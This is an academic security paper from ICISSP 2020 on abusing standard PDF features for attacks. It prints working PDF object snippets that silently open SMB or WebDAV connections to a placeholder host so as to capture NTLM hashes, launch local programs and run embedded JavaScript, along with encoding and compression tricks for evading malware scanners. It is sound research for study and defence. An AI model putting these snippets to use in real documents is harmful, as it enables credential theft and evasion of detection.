A Curious Exploration of Malicious PDF Documents

Julian Lindenhofer, Rene Offenthaler and Martin Pirker

Institute of IT Security Research, University of Applied Sciences St. P

olten, Austria

Keywords:

PDF Documents, Malware, Malicious PDFs, Security.

Abstract:

The storage, modiﬁcation and exchange of digital information are core processes in our internet connected

world. Common document formats enable this digital information infrastructure. More speciﬁcally, the widely

used PDF document format is a commodity container for digital information. Although PDF ﬁles are a well

established format, users may not know that they contain not only simple textual information, but can also

embed pieces of program code, sometimes malicious code. This paper explores the capabilities of the PDF

format and the potential of its built-in functions for malicious purposes. PDF ﬁle processors that implement

the full PDF standard also potentially enable credential phishing, loss of privacy, malicious code execution

and similar attacks via PDF documents. Furthermore, this paper discusses the results of practically evaluated,

working code snippets of PDF feature misuse and strategies to obfuscate and hide malicious code parts in a

PDF document, while still conforming to the PDF standard.

1 INTRODUCTION

The knowledge of our world is increasingly in digital

documents. These are the basis of our daily digital

information ﬂows for knowledge transfer, our busi-

ness accounting, education, or even our governmental

processes. As these documents are a part of our daily

life, and they work ﬁne so far, users do not think about

their potential to turn evil. Despite their widespread

distribution, only a few know that a simple opening of

a document may trigger bad consequences.

A popular document format is the Portable Docu-

ment Format, commonly abbreviated as PDF. It pro-

vides attractive features for storage and exchange of

information and there are also a large number of ap-

plications and platforms with PDF support. Either an

operating system already comes with support to han-

dle PDFs, or third party developers offer supplemen-

tal standalone PDF apps or extension modules. Today,

the most popular webbrowsers already have built-in

PDF rendering support (e.g. (Google, 2019)).

A widespread ﬁle format, just like a common op-

erating system, is a natural attraction for malicious

actors. Document-based malware attacks are on the

rise and draw attention in IT-security notes, for exam-

ple (Zurkus, 2019). Malware infected documents are

used for a diverse set of malicious activities, such as

spear phishing, code execution or credential phishing,

see e.g. (O’Donnell, 2019).

Due to the wide use of PDF-enabled applications

there is an always present attack surface. However,

as applications and environments vary, attacks need

to adapt intelligently to beneﬁt from target speciﬁc

customisations and known weaknesses. An especially

promising approach is to simply (ab-)use already ex-

isting PDF functionalities, which are provided—have

to be provided—by a PDF-enabled application, as

they are deﬁned in the ofﬁcial PDF standard.

This paper explores targeted attacks coming from

malicious documents, with a focus on attacks based

on the widely used document format PDF. The PDF

document standard already speciﬁes several functions

that can be (ab-)used creatively to achieve the goals

of a targeted attack. We take advantage of these func-

tions, as they are readily available in every speciﬁca-

tion conforming PDF document processor or viewer.

Furthermore, as anti-malware protection engines fo-

cus on the detection of speciﬁc patterns of attacks,

we also consider techniques to obfuscate maliciously

modiﬁed documents from detection. There are al-

ready previous works in this problem domain, but un-

fortunately the information is spread and sometimes

already years old. We believe this paper to be a

unique, updated, aggregate presentation of PDF func-

tions for potential attacks, how to prepare documents

and what the expected result of a malicious payload

is, and the application of obfuscation techniques to

hide certain content parts.

Lindenhofer, J., Offenthaler, R. and Pirker, M.

A Curious Exploration of Malicious PDF Documents.

DOI: 10.5220/0008992305770584

In Proceedings of the 6th International Conference on Information Systems Security and Privacy (ICISSP 2020), pages 577-584

ISBN: 978-989-758-399-5; ISSN: 2184-4356

577

2 BACKGROUND AND RELATED

WORK

The PDF Format. As of now, the most widely used

version of the PDF format, version 1.7, is speciﬁed as

a public, freely downloadable ISO standard (Adobe,

2008). In theory, every PDF ﬁle strictly follows this

standard and PDF ﬁle processors implement as much

of the standard as necessary for their intended ap-

plication domain. Every PDF document consists of

the following four major parts: Header, body, cross-

reference table and trailer.

The header deﬁnes the PDF version. Following

the header, the body contains all parts that are visible

for a document viewer. The body consists of data ob-

jects, which are connected to each other in a tree-like

structure. Every object within the body is identiﬁed

by an unique object identiﬁer, which other objects use

in references between objects. The tree structure has

a root object, the so-called catalog. The objects in

the body are of different types, for example arrays,

streams, strings and others.

The third part, the cross-reference table enables

direct access to every object in the body. It provides a

mapping of the offset in bytes from the absolute start

of the document to any object in the document.

The fourth part, the trailer at the end of every PDF,

points to the location of the cross reference table.

Consequently, processing of a PDF document

works approximately as follows: A PDF processor

reads the ﬁrst bytes of a document and veriﬁes the

PDF version in the header. Then, immediately jumps

to the document end, the trailer there reveals the posi-

tion of the cross reference table and the object number

of the root object. Based on this information the cross

reference table enables access to all the objects avail-

able in the body, processing continues at the so-called

catalog object of the document.

Due to space constraints this overview is brief,

for more information please consult the PDF standard

(Adobe, 2008). As PDF also supports embedding of

JavaScript code, there is an additional standard docu-

ment (Adobe, 2007) for this speciﬁc feature. Adobe,

as the promoter of PDF and major vendor of PDF re-

lated software, created a JavaScript API with a set of

methods they support in their software suites. PDF

applications from other vendors cloned these methods

and support them as well.

PDF Malware Analysis. Several works already

tried various analysis strategies for the contents of

PDF documents. Studying their results provides in-

spirations on how to create malicious documents.

The paper of (Ulucenk et al., 2011) introduces into

the analysis process of PDF documents. They propose

their tool PDSCAN that uses static and dynamic anal-

ysis techniques. Moreover, the paper considers at-

tacks with predeﬁned PDF functions. We reuse some

of these ideas in our code (see Section 4). The paper

does a complete PDF analysis step by step, with tools

like pdfparser or Malzilla, and also considers the us-

age of PDF streams to obfuscate malicious parts in

documents. The focus of this paper is on the analysis

of PDF documents and classiﬁcation of possible ma-

licious content. In contrast, we consider general mis-

use cases and the combination of standard functions

for actual attacks.

The focus of (Lu et al., 2013) is on PDF embedded

malicious JavaScript. They observe that static and dy-

namic analyses alone are not sufﬁcient. They propose

their MPScan tool that ﬁrst dynamically extracts de-

obfuscated JavaScript code by hooking into the closed

source commercial Adobe Acrobat and then performs

several static analysis techniques to detect JavaScript

malware. Their experimental evaluation results are

promising and they do ﬁnd malicious contents.

PDF Attacks and Obfuscation Challenges. Going

beyond analysis oriented works, there are also papers

that examined how to create malicious contents and

use them for attacks.

The paper Malicious origami in PDF from (Ray-

nal et al., 2010) explores certain predeﬁned functions

in the PDF format and their potential usage for at-

tacks. The authors focused on the then market lead-

ing Adobe Acrobat Reader software and its security

model and JavaScript support. Specially crafted ma-

licious attachments, JavaScript functions, obfuscation

of malicious content within the document and use of

ﬁle encryption show that the market leader is driven

by adding more functionality and not by security, and

that programs with a more limited subset of PDF fea-

tures implemented appear to be a safer choice if the

advanced functions are not needed.

The title of the paper Looking at the Bag is not

Enough to Find the Bomb: An Evasion of Structural

Methods for Malicious PDF Files Detection already

suggests what it is about (Maiorca et al., 2013). They

consider the logical internal structure of objects in

a PDF ﬁle. Changes to the internal structure, to a

structure that common PDF programs do not produce,

makes the detection of malware easier. So instead of

manipulating a malicious PDF to mimic benign pat-

terns, they propose the manipulation of a benign ﬁle

to make it malicious, in a so-called Reverse Mimicry

attack. They implant executables, JavaScript code and

other modiﬁed PDF documents into a harmless docu-

ICISSP 2020 - 6th International Conference on Information Systems Security and Privacy

578

ment. The attack itself is carried out when the docu-

ment is opened. They conclude that with their method

of construction it is harder for analysis tools to detect

that a document has malicious content.

Another article (Stevens, 2011) explores several

methods for attacking clients via malformed PDF

documents. The main focus is on using JavaScript

for heap spraying and then how to execute such mali-

ciously injected code through vulnerabilities like the

JBIG2Decode bug or the util.printf format string. The

author also mentions that PDF application vendors

are starting to implement security features to prevent

these kind of attacks, or already do.

A recent paper (Maiorca and Biggio, 2019) pro-

vides an overview on current attack patterns with PDF

documents. They ﬁnd techniques like heap overﬂow,

bitmap attachments and code executions in attacks.

They then apply their knowledge to consider foren-

sic analysis methods for PDF documents: keyword-

based, tree-based and code-based.

3 SCENARIO

3.1 Misuse Cases

A promising attack vector is always the capability to

initialize an outgoing network connection. Expected,

normal outgoing connections from a document are

weblinks, external resource accesses like images or

videos, connections to other documents, or the des-

tination URL that a form submits to. If an attack is

successful in changing the connection destination(s)

of these “normal” functions, as they are provided and

intended by the PDF standard, it basically becomes

possible to force a document to connect to an arbi-

trary, attacker-chosen web destination. Such a con-

nection is then the basis to track the opening of a doc-

ument or cause it to late-load additional, malicious

code. Also, depending on the used protocol of the

connection it becomes possible to cause further side-

effects, like the collection of additional information

about the user who opened the document.

A second misuse category is the possibility to

embed malicious ﬁles or code within a document,

and execute them. Of special interest is that the

PDF format enables the embedding and execution of

JavaScript code. The Adobe JavaScript API (Adobe,

2007) intends the available functions for automatic

form validation, clearly a beneﬁcial use case. Natu-

rally, this embedding of JavaScript code demands a

security model for execution, which every PDF pro-

cessor must implement. Consequently, this also mo-

tivates a closer examination of different applications,

whether it is possible to execute malicious code and

attack the runtime environment of a PDF reader.

A third interesting attack perspective is the dy-

namic nature of PDFs. The same document may

be rendered differently in different PDF applications.

Depending on the implementation level of the PDF

standard and JavaScript support, there are some dif-

ferences in rendering of a document’s contents. This

questions the consistency of the presentation of a PDF

document to a user.

3.2 Triggers

The discovery of a misuse-able function in the PDF

standard is not enough for an attack, it is mandatory

that the function is also triggered, by some mecha-

nism, to execute. In the best case, a function starts au-

tomatically, solely triggered by opening a document,

without any user interaction.

The PDF standard suggests two functions than can

be used for this, which we examine in the following

more closely: OpenAction and AA. We believe with-

out these trigger functions it is not possible to force a

document to execute certain methods automatically.

OpenAction. This trigger is an optional attribute of

a document’s so-called catalog object. The catalog

object, as already mentioned in Section 2, is the root

object of the document, every object is connected to

the root object. The trigger is automatically activated

upon reading of the root object, which means when

a document is opened. The parameters of OpenAc-

tion can be either destinations within the document,

or more actions. This trigger is executed very early

due to the fact that it is part of the catalog object.

AA. A so-called AA trigger is an “additional ac-

tion” trigger. It is possible to deﬁne this trigger for

every page, form and also for the root object. This

trigger offers many possibilities, the most common

ones are “O” for open and “C” for close, so this trig-

ger executes additional methods when a page it is de-

ﬁned for is either opened or closed. A special case is

if this trigger is embedded into the ﬁrst page of a doc-

ument, then is is always executed when a document is

opened. Overall, the AA trigger is very similar to the

OpenAction trigger.

3.3 Potential Functions

With potential triggers identiﬁed, what is left is to also

identify functions to misuse. The PDF standard of-

ten mentions actions that make a document more “in-

teractive and dynamic”. While these actions provide

A Curious Exploration of Malicious PDF Documents

579

useful features for documents, they can be manipu-

lated to perform interactions and dynamics beyond

what they were probably intended to. The following

actions are deﬁned in the standard and are our candi-

dates for manipulation:

• GoTo: “Go-to” a destination within the document

• GoToR: “Go-to remote” destination

• GoToE: “Go-to embedded” destination

• URI: resolve an uniform resource identiﬁer

• SubmitForm: send form data to URL

• ImportData: import ﬁeld values

• Thread: begin reading an article thread

• Launch: an application

• JavaScript: execute JavaScript code

There are some additional actions deﬁned in the stan-

dard, however from an initial evaluation these actions

do not seem to support the embedding of external

destinations or the implementation of malicious code.

Consequently, this paper focuses only on the actions

listed here.

4 IMPLEMENTATION

With all the ingredients known (Section 3), this sec-

tion now combines the triggers and actions identi-

ﬁed into practical, working prototype attacks for/em-

bedded within PDF documents (Section 4.1). While

JavaScript is basically also just an action, JavaScript

speciﬁcs are in a separate subsection (Section 4.2),

as it is much more complex and provides many op-

portunities for maliciousness. Another subsection ex-

plores the chaining of actions (Section 4.3), followed

by strategies on how to obfuscate attacks from mal-

ware detectors (Section 4.4).

Unfortunately, we observe that PDF supporting

applications are fast moving targets and receive a con-

stant stream of updates. Therefore, considering also

the wide variety of PDF processors, we believe it

makes no sense to highlight and mention speciﬁc ver-

sions of exploitable applications here and we accept

that probably the attacks enumerated here may no

longer work in software updated to the latest version.

4.1 Actions

GoTo. The GoTo action was initially promising, how-

ever, on closer examination due to the structure of the

GoTo action we found it impossible to apply the GoTo

action for practical misuse cases.

GoToR. This action is useful for connecting differ-

ent PDF documents and jumping or navigating be-

tween them. In principle, the PDF standard dis-

tinguishes between a URI and a ﬁle speciﬁcation

with external references, to separate web destinations

and other documents as destinations. So-called ﬁle

speciﬁcations deﬁne a destination reference to an-

other PDF ﬁle. The ﬁle speciﬁcation in the PDF

standard deﬁnes the format of a ﬁle path like this:

/folder1/folder2/file.pdf

Inside a PDF, ﬁle speciﬁcations are in this for-

mat and applications then transform such a path dur-

ing rendering of a document to a system-dependant

path format, as expected by the operating system in

use. The exact transformations are speciﬁed in the

PDF standard, for example a “\keyword” sequence is

treated as a special sequence in a string. However, in

Windows environments backslashes play also an im-

portant role in paths and for connections to external

destinations. Together, these two properties of PDF

and Windows motivate a non-standard ﬁle speciﬁca-

tion: \\1.1.1.1\test\test.txt

In Windows a valid path to an external resources

must start with two backslashes and the destination,

followed by folders separated by backslashes between

every name of a folder. Therefore, the manipulation

here is the use of four and two backslashes, because

two backslashes transform into one (the ﬁrst one es-

capes the second one in PDF).

The code for a complete attack that combines au-

tomated execution when a document is opened (Ope-

nAction), with a GoToR action that points to a mali-

cious destination (non-standard path) looks like this:

/OpenAction

/S /GoToR

/F <<

/F (\\\\1.1.1.1\\test\\test.txt)

/Type /Filespec >>

/D [ 0 /Fit ]

The key “S” deﬁnes the type of action. “F” speciﬁes

that the following part is a ﬁle speciﬁcation and the

destination path. The following “D” deﬁnes the page

in the destination document, which is in this example

the ﬁrst page. This code initiates an outgoing SMB

connection with certain PDF viewers on Windows.

Naturally, these attacks always depend on the spe-

ciﬁc application, if it implements the complete set

of standard functions and what kind of security mea-

sures. These implementation speciﬁcs can differ quite

a lot between different PDF applications.

The SMB protocol is not the sole possibility here.

An attractive alternative is HTTP, however HTTP

(usually) requires connections on port 80, so with the

ICISSP 2020 - 6th International Conference on Information Systems Security and Privacy

580

addition of an explicit port to our destination it looks

like: \\1.1.1.1@80\test\test.txt

Due to that syntax Windows accesses the given

path through port 80. Since Windows uses WebDAV

by default for ﬁle accesses through port 80 this is also

triggered by this testcase. Comparing HTTP to SMB,

the advantage here is that ﬁlter systems and ﬁrewall

perimeters normally do not block port 80.

GoToE. The GoToE “Go-To-Embeded” action is

quite similar to the previous GoToR action. Its struc-

ture is identical and it is also possible to manipulate

the path of the embedded ﬁle speciﬁcation.

URI. The URI action resolves hyperlinks to webre-

sources. Execution of this action opens the webre-

source that is deﬁned in the action in a webbrowser.

In combination with automated triggers it is possible

to automatically open a web resource when a docu-

ment is opened.

A prototype snippet to achieve a malicious imple-

mentation that takes advantage of URI looks like this:

/AA

/O <<

/URI (http://1.1.1.1/test.txt)

/S /URI >>

This code shows the combination of URIs with an ad-

ditional action (AA) trigger, but an OpenAction trig-

ger would also work in this case. The keyword “O”

deﬁnes that the action is automatically executed when

the page is opened. It is important to remember to add

the AA trigger to the ﬁrst page of a document, other-

wise the action does not execute immediately when

the document is opened.

If the URI points to a website and then the web-

site opens in a browser, further attacks like cross-site

scripting (XSS) may widen the attack surface.

The difference between the URI resource and the

GoToR/E actions in previous sections is that here it is

an URI destination type resource and the other actions

(so far) use ﬁle speciﬁcations as destination. There

are signiﬁcant differences how PDF processors han-

dle these two resource types and also whether they

apply security measures. Some applications already

implement pop-ups that require a user’s conﬁrmation

to access these (external) resources.

Another difference between the URI action and

GoToR/E is that URI “noisily” opens a browser, it

is not a background-type of attack. To contrast, Go-

ToR/E operates “silently” in the background, if no se-

curity measure interrupts it.

For an URI the obvious choice is a nor-

mal HTTP access, but it is also possible to

initiate a ﬁle access via the SMB protocol:

URI (file://1.1.1.1/test/test.txt)

As this is still an URI action, PDF applications

open a browser on execution of the action and the

browser displays the requested resource (or 404 error

if not found).

SubmitForm. This action is a kind of hybrid action.

It was originally designed to send data from interac-

tive forms within a PDF document to a given desti-

nation. Therefore, it uses a special format for the ﬁle

speciﬁcation. It is a ﬁle speciﬁcation with an URI

path, the result is a ﬁle speciﬁcation that acts like a

URI action. The keyword “Fields” deﬁnes the data

that should be transmitted. The automated usage of

SubmitForm looks like the following:

/F <<

/F (http://1.1.1.1/test.txt)

/Type /Filespec >>

/Fields [ ]

/S /SubmitForm

The connection is established via a HTTP POST re-

quest. In our practical testing it was impossible to

initiate SMB connections with this action.

ImportData. Besides exporting data via the Sub-

mitForm action, PDF also supports the import of ex-

ternally provided data. The ImportData action imple-

ments the import of FDF (Forms Data Format) ﬁles.

The format of the resource to import is similar to the

other actions that use a ﬁle speciﬁcation:

/F (\\\\1.1.1.1\\test\\test.txt)

/S /ImportData

This establishes, depending on if the application sup-

ports forms, a SMB connection in the background.

Building on this, attackers may again analyze the

SMB connection itself, provide maliciously modiﬁed

FDF data, or even change other parts of a PDF docu-

ment by additional exploit techniques.

Thread. This action enables positional changes

within one document or between multiple PDF doc-

uments. As Thread uses a ﬁle speciﬁcation, it is also

possible to manipulate it:

/S /Thread

/F (\\\\1.1.1.1\\test\\test.bat)

/D [ 0 /Fit ]

Launch. The last action for a closer look is the

Launch action. It is very attractive, because it pro-

vides huge possibilities for maliciousness. Launch

enables the execution of applications on a client’s sys-

tem. Again, the Launch action includes a ﬁle speci-

ﬁcation, therefore access to external resources is also

possible. An implementation looks like the following:

A Curious Exploration of Malicious PDF Documents

581

/S /Launch

/F (c:/windows/system32/calc.exe)

/D [ 0 /Fit ]

The PDF standard deﬁnes that PDF documents must

provide the capability to launch different kinds of

tools, local and remote. The standard also describes

“keys” to add parameters for executing these appli-

cations. This is an attractive target to execute com-

mands within the command-line interface (CMD) or

the Powershell environment on Windows.

As this action is capable to really, deeply harm

systems, many vendors of software for PDF docu-

ments implement security measures for this action.

However, with some applications it is still possible to

execute code through this action.

4.2 JavaScript

As of PDF 1.3 it is possible to embed JavaScript code

within PDF documents. The intention was to im-

prove forms management and validation of input for

PDFs. It is also possible to connect such embedded

JavaScript code with automated triggers. An example

for automated JavaScript code execution is this:

/OpenAction

<< /JS ( app.alert("test"); )

/S /JavaScript >>

As discussed in the related work, JavaScript was al-

ready used for attacks. As a consequence, Adobe

also implemented a security model: Adobe provides

their own API speciﬁcation (Adobe, 2007) for all sup-

ported functions and also their classiﬁcations for their

security model. The functions differ in their deﬁnition

between a privileged and a non-privileged context.

All critical functions, or at least from Adobe classiﬁed

as critical functions, are executed in the privileged

context. This causes a security warning for the user

before such a function is executed. The user must ac-

cept the warning to proceed. All the other functions,

which are deﬁned for the non-privileged context, ex-

ecute without any restrictions and warnings.

The API may also deﬁne additional restric-

tions for a critical function. For example, the

“launchURL” method is speciﬁed so that the URL

schemes “javascript” and “ﬁle” are not allowed. On

the other hand, it is possible that potentially critical

methods are not marked as critical and are executed

in the non-privileged mode. For example, “OpenDoc”

is classiﬁed as non-critical, although it is possible to

deﬁne the path to an external destination:

/JS(app.openDoc("/1.1.1.1/test.pdf");)

/S /JavaScript

As it is up to an application to enforce restrictions,

the situation is similar to PDF actions. The security

measures differ, it is up to the software vendors what

they implement in their applications and what not.

The feature to run JavaScript code causes fur-

ther differences to PDF applications that cannot run

JavaScript code. If JavaScript code adds text boxes,

text or otherwise changes the content displayed, it is

possible to create PDF documents that look different

in different applications. Hardly a normal user of PDF

documents expects such a behaviour. It is possible

that a value within textboxes differs between two ap-

plications, one executes the JavaScript code and adds

a custom textbox on-the-ﬂy over the original text and

the other does not.

4.3 Action Chaining

The syntax of PDFs supports the chaining of actions

in documents. This is a very useful feature to combine

different malicious actions. As chaining can also be

used for JavaScript actions, this increases the prob-

ability for a successful attack. The “Next” keyword

chains the actions in the following example:

/F <<

/F (\\\\1.1.1.1@80\\test\\test.txt)

/Type /FileSpec >>

/D [ 0 /Fit ]

/Next <<

/F <<

/F (\\\\1.1.1.1\\test\\test.txt)

/Type /FileSpec >>

/D [ 0 /Fit ]

/S /GoToR

Here, the Next keyword links the execution start-

ing with the outer object with the object placed after

the Next keyword, it is executed when the outer ob-

jects ﬁnishes. The syntax basically allows an inﬁnite

amount of chained actions within a PDF document,

however, obviously, the more actions are chained, the

longer a document needs for rendering, and a notice-

able delay might signal to a user that there is some

malicious content within the document.

4.4 Obfuscation

Most of the content within a PDF document is in clear

text format and editable with a plain text editor. As

reviewed in the related work, some ﬁrewall perime-

ters or antivirus engines work solely with signature

detection strategies for PDF documents. Therefore, it

is wise to hide and obfuscate malicious functions, to

avoid potential detection and malware analysis.

The are several strategies to obfuscate malicious

content and all these techniques can be combined in

various ways. For PDF readers these methods are

ICISSP 2020 - 6th International Conference on Information Systems Security and Privacy

582

transparent. Used appropriately, a PDF reader renders

a document not differently.

Streams. Streams are a datatype within the PDF

format and streams support the application of ﬁlters to

the data of a stream. Through use of ﬁlters it is pos-

sible to hide the content of the stream, which either

consists of the manipulated actions or the JavaScript

code. The usage of a stream looks like the following

example:

5 0 obj

<< /Filter /FlateDecode

/Length 3 >>

stream

xxy

endstream

endobj

Here, this example uses the FlateDecode ﬁlter to pack

(via zlib/deﬂate compression) the data. All the en-

coded data is between “stream” and “endstream”. By

application of the appropriate ﬁlter(s) it becomes very

difﬁcult for analysis tools to obtain the plain text.

Different Spelling/String Manipulation. Thanks

to the versatile syntax of PDF documents it is also

possible to write strings in different ways. Also, it is

valid to use certain different spellings for keywords

within one document. Together, this is useful if static

analysis tools are just searching with brute-force for

speciﬁc keywords within a document, for example

“JavaScript”. To hide such an important keyword, the

following example uses a hexadecimal encoding:

/S /URI

/#55#52#49 (https://example.org)

This example shows how the keyword “URI” is (re-

)written into hexadecimal notation. It is also possible

to actually write whole passages of code in such an

encoding, for example a longer example of JavaScript

in octal encoding is:

/JS(\164\145\163\164)

/S /JavaScript

For easier understanding, the keywords are not en-

coded in this example, although it is also possible.

Random line breaks placed into different parts of

the code are also a simple generation of noise. A PDF

rendering engine ignores them and just concatenates

the string pieces.

5 DISCUSSION / REVIEW

The practical code snippets developed and presented

in this paper prove that certain functions of the PDF

format are useable for malicious activities. These are

Figure 1: NTLM authentication via SMB request, captured

with Wireshark.

standard, legal functions speciﬁed in the PDF stan-

dard (Adobe, 2008) or the Adobe JavaScript API

(Adobe, 2007) for their popular Acrobat reader. We

have shown how to go beyond the original speciﬁca-

tion and be more creative and move to new places,

beyond those intended by the standards. We also ob-

served that the PDF rendering applications are basi-

cally responsible for their own security measures, be-

cause the main PDF standard is lacking in this area.

The success of individual misuse cases depends

on the PDF-enabled application and the completeness

of its standard implementation and security measures.

As these applications change continuously and re-

ceive updates quite often, in our practical prototyping

it was challenging to determine the level of supported

standard functions and the security measures for each

application. Especially in this explorative work, the

construction and testing of different misuses cases, it

happened that an application suddenly changed its be-

haviour for a speciﬁc function.

The work presented in this paper focuses on the

now widely deployed ISO32000:1 standard, which

means PDF 1.7, additional work is necessary with

the designated successor, the ISO 32000:2 (PDF As-

sociation, 2017) standard. ISO 32000:2 is the basis

for PDF version 2.0, a “reﬁnement of the venerable

PDF format”, not a replacement of PDF 1.7. Unfor-

tunately, PDF 2.0 is not publicly, freely available.

Data Leaks Via Attacker Controlled External Des-

tinations. The ﬁrst misuse case was about establish-

ing connections to external destinations. We were

able to use actions and JavaScript code to initiate

SMB as well as HTTP connections.

Unfortunately, we did not succeed to code one

universal attack that works with every PDF applica-

tion. However, when we found a vulnerable PDF

reader, the resulting SMB connection provides the

following information to an attacker: IP-Address, Do-

mainname, Username, Hostname, Operating system

version, NTLM-Passwordhash and Timestamp.

To receive all these information a special SMB

connection procedure is necessary: The destination

A Curious Exploration of Malicious PDF Documents

583

server must force the client (which opened the PDF

document) to authenticate itself. For this, we used the

Responder application by Spiderlabs (Gafﬁe, 2019).

The application starts a SMB server and waits for in-

coming connections. It tries to collect as much infor-

mation as possible from the incoming connection(s).

Figure 1 shows a Wireshark capture of an NTLM au-

thentication, which is used by Windows for an SMB

connection, and here forced by the responder, initially

triggered by a malicious PDF.

In our testing, GoToR, GoToE, ImportData,

Launch and Thread succeed to connect to such a

server. Some actions even did not alert or message the

client during or before their execution. Others alert a

user after execution that the requesting ﬁle was not

available or that there is a printing error. We believe

this confusing error to be caused by some applications

because some applications were not able to handle the

unexpected responses from the actions. Some appli-

cations recognized the outgoing connection and asked

for a user’s permission before they executed them.

Creating connections with JavaScript was not as

successful as solely actions, but it was also possible to

create some SMB and HTTP connections, especially

with browsers. Most of the applications also repli-

cate the privileged and non-privileged modes from the

Adobe JS API and ask users for their permission to

execute critical requests.

6 CONCLUSION

The original motivation for this paper was to investi-

gate whether today PDF processing applications are

already fully secured, or whether there are still ways

to misuse standard PDF format functions for ma-

licious goals. We enumerate in this paper candi-

date PDF functions, along with their potential mis-

use cases. Through the combination of triggers, ac-

tions and/or JavaScript code segments it is (still) pos-

sible to constructs malicious PDFs, although the re-

sults vary with every application. With the code ex-

amples it was possible to initiate connections to ex-

ternal destinations, execute code or change content

within the document. The success always depends on

the used PDF rendering engine and the completeness

of its PDF standard implementation and security mea-

sures.

We discovered no universal attack that is success-

ful for every application. As PDF applications are fast

moving targets, we expect the exploits to be already

patched in the most popular applications when you

read this, however we believe our summary presenta-

tion here is a good basis for future work in this area.

ACKNOWLEDGEMENTS

The ﬁnancial support by the Christian Doppler Re-

search Association, the Austrian Federal Ministry for

Digital and Economic Affairs and the National Foun-

dation for Research, Technology and Development is

gratefully acknowledged.

The work presented in this paper was done at the

Josef Ressel Center for Uniﬁed Threat Intelligence on

Targeted Attacks (TARGET), at St. P

olten University

of Applied Sciences, Austria.

REFERENCES

Adobe (2007). JavaScript for Acrobat API Ref-

erence; Adobe Acrobat SDK Version 8.1.

https://www.adobe.com/content/dam/acom/en/devnet/

acrobat/pdfs/js api reference.pdf.

Adobe (2008). ISO 32000-1; Portable document format –

Part 1: PDF 1.7. https://www.pdfa.org/resource/iso-

32000-1-pdf-1-7/.

Gafﬁe, L. (2019). Responder, a LLMNR/NBT-NS/mDNS

poisoner. https://github.com/lgandx/Responder.

Google (2019). Pdﬁum: a PDF rendering engine.

https://opensource.google.com/projects/pdﬁum.

Lu, X., Zhuge, J., Wang, R., Cao, Y., and Chen, Y. (2013).

De-obfuscation and detection of malicious pdf ﬁles

with high accuracy. In System sciences (HICSS), 2013

46th Hawaii international conference on, pages 4890–

4899. IEEE.

Maiorca, D. and Biggio, B. (2019). Digital investigation

of pdf ﬁles: Unveiling traces of embedded malware.

IEEE Security and Privacy: Special Issue on Digital

Forensics, 17:63–71.

Maiorca, D., Corona, I., and Giacinto, G. (2013). Looking

at the bag is not enough to ﬁnd the bomb: an evasion

of structural methods for malicious pdf ﬁles detection.

In Proceedings of the 8th ACM SIGSAC symposium on

Information, computer and communications security,

pages 119–130. ACM.

O’Donnell, L. (2019). Phishing campaign deliv-

ers nasty ransomware, credential-theft two-

punch. https://threatpost.com/phishing-gandcrab-

ursnif/141182/.

PDF Association (2017). ISO 32000-2; PDF 2.0 speciﬁca-

tion. https://www.pdfa.org/resource/iso-32000-2-pdf-

2-0/.

Raynal, F., Delugr

e, G., and Aumaitre, D. (2010). Mali-

cious origami in pdf. Journal in computer virology,

6(4):289–315.

Stevens, D. (2011). Malicious pdf documents explained.

IEEE Security Privacy, 9(1):80–82.

Ulucenk, C., Varadharajan, V., Balakrishnan, V., and Tu-

pakula, U. (2011). Techniques for analysing pdf mal-

ware. In Software Engineering Conference (APSEC),

2011 18th Asia Paciﬁc, pages 41–48. IEEE.

Zurkus, K. (2019). Document-Based Malware on

the Rise in 2019. https://www.infosecurity-

magazine.com:443/news/document-based-malware-

on-rise-2019/.

ICISSP 2020 - 6th International Conference on Information Systems Security and Privacy

584